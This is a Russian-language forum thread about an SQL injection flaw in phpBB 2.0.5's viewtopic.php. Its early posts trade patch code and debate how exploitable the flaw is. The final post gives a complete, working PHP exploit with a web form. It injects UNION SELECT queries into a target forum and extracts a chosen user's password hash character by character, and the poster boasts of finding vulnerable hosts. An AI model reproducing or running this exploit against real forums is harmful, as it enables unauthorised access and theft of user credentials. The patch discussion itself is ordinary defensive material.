Меню
Что нового?

Очередная дыра в PHPBB 2.0.5

IBSN-RELOAD

Guest
Я плохо знаю англ. но понял, что заменить, а:
1) Что за дыра ???
2) Кто нить проверил, нехочу быть первым у кого форум полетит...
 

*.MOFF.*

Guest
найди этот код в viewtopic.php:
PHP: 
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) ) 
{ 
      $topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]); 
} 
else if ( isset($HTTP_GET_VARS['topic']) ) 
{ 
      $topic_id = intval($HTTP_GET_VARS['topic']); 
}
добавь туда:
PHP: 
$topic_id = $post_id = false;
++++++++++++++++++++++++++

дальше прокрути ниже, и найди:

PHP: 
$join_sql_table = ( !isset($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 "; 
$join_sql = ( !isset($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id"; 
$count_sql = ( !isset($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts"; 

$order_sql = ( !isset($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC";
замени этот код на :
PHP: 
$join_sql_table = ( empty($post_id) ) ? '' : ", " . POSTS_TABLE . " p, " . POSTS_TABLE . " p2 "; 
$join_sql = ( empty($post_id) ) ? "t.topic_id = $topic_id" : "p.post_id = $post_id AND t.topic_id = p.topic_id AND p2.topic_id = p.topic_id AND p2.post_id <= $post_id"; 
$count_sql = ( empty($post_id) ) ? '' : ", COUNT(p2.post_id) AS prev_posts"; 

$order_sql = ( empty($post_id) ) ? '' : "GROUP BY p.post_id, t.topic_id, t.topic_title, t.topic_status, t.topic_replies, t.topic_time, t.topic_type, t.topic_vote, t.topic_last_post_id, f.forum_name, f.forum_status, f.forum_id, f.auth_view, f.auth_read, f.auth_post, f.auth_reply, f.auth_edit, f.auth_delete, f.auth_sticky, f.auth_announce, f.auth_pollcreate, f.auth_vote, f.auth_attachments ORDER BY p.post_id ASC";
усё
 

IBSN-RELOAD

Guest
зы это я понял,дело в том что я не понял в чем баг??? у меня все работает отлично, какой баг то там???
 

IBSN-RELOAD

Guest
сделал как написано =( sql error спасибо, хорошо сделал копию
 

SeazoN

Guest
PHP: 
$topic_id = $post_id = 0;
if ( isset($HTTP_GET_VARS[POST_TOPIC_URL]) )
{
	$topic_id = intval($HTTP_GET_VARS[POST_TOPIC_URL]);
}
else if ( isset($HTTP_GET_VARS['topic']) )
{
	$topic_id = intval($HTTP_GET_VARS['topic']);
}
false может привести к ошибке, вот и всё.
И вообщето эта иньекция больше теоретическа чем реальная, register_globals = off вообще сводят её на нет
 
fixxxer

fixxxer

К.О.
Партнер клуба
я без особых проблем нашел где register globals = on и mysql 4.x. например, валуехост. :)

скрипт:
PHP: 
<?php
/////////////////////////////////////////////////////////////////
// phpBB 2.0.5 exploit
//
// using SQL injection vuln in viewtopic.php
//
// based on phpbb_sql.pl by Rick <[email protected]>
//
// fixxxer <fixxxer[at]dizenteria[dot]ru>
/////////////////////////////////////////////////////////////////
error_reporting (E_ERROR | E_WARNING | E_PARSE);
set_magic_quotes_runtime(0);
set_time_limit(0);
?><html><head><title>phpBB 2.0.5 exploit</title></head><body><?php

if (isset($_POST['phpbburl']) && isset($_POST['phpbbid'])) {
  do {

    $url = @parse_url($_POST['phpbburl']);

    if (!isset($url['host'])) {
      echo "Bad URL entered";
      break;
    }

    $host = $url['host'];
    $port = isset($url['port'])?$url['port']:80;
    $path = isset($url['path'])?preg_replace("![^/]*\.php.*!","",$url['path']):"/";

    for ($tries=0, $p='', $i=1; $i<33; $i++) {

      $f = fsockopen($host, $port, $errno, $errstr, 30);
      if (!$f) {
        echo "Error # $errno while connecting to $host:$port - $errstr<br>";
        break;
      }

      $rq = "GET ".$path."viewtopic.php?".
        "sid=1&topic_id=-1%20".
        urlencode("union select ord(substring(user_password,$i,1)) from phpbb_users ".
        "where user_id=".$_POST['phpbbid']." /* ") .
        "&view=newest HTTP/1.0".
        "\r\nHost: $host\r\nCookie: phpbb2mysql_sid=1\r\n\r\n";

      if($_POST['debug']==1) echo "<b>[$i]</b> $rq";

      fwrite($f, $rq);

      for ($letter=''; !feof($f); ) {
        $re = fgets($f,256);
        if($_POST['debug']==1) echo "<table border=1 width=100%><tr><td>$re</table>";
        if (preg_match("/Location[^#]*#([0-9]+)/", $re, $a)) {
          $letter = chr($a[1]);
          break;
        }
      }

      fclose($f);

      if ($letter=='') {
        if ($tries++<3) {
          if($_POST['debug']==1)
            echo "Failed to recv has letter # $i - retrying [$tries/3]...<br>";
          $i--;
          continue;
        } else {
          echo "Passwd hash letter # $i could not be retrieved<br>";
          break;
        }
      }

      $p .= $letter;
      $tries=0;
    }

    if(strlen($p)==32)
      echo "<br>Password hash: \"$p\"<br>";
    else
      echo "<br>There were some errors. We could retrieve just this: \"$p\"";

  } while(false); 
  echo "<hr>"; 
}

?><form method=post>
URL to phpBB forum: <input type=text size=50 name=phpbburl><br>
User's id: <input type=text size=20 name=phpbbid><br>
<input type=submit value=" Go "><input type=checkbox name=debug value=1> Debug info
</form>
Attention: this works only if register_globals=on and MySQL version is 4.x on the attacked server
</body></html>
 
Войдите или зарегистрируйтесь для ответа.
Сверху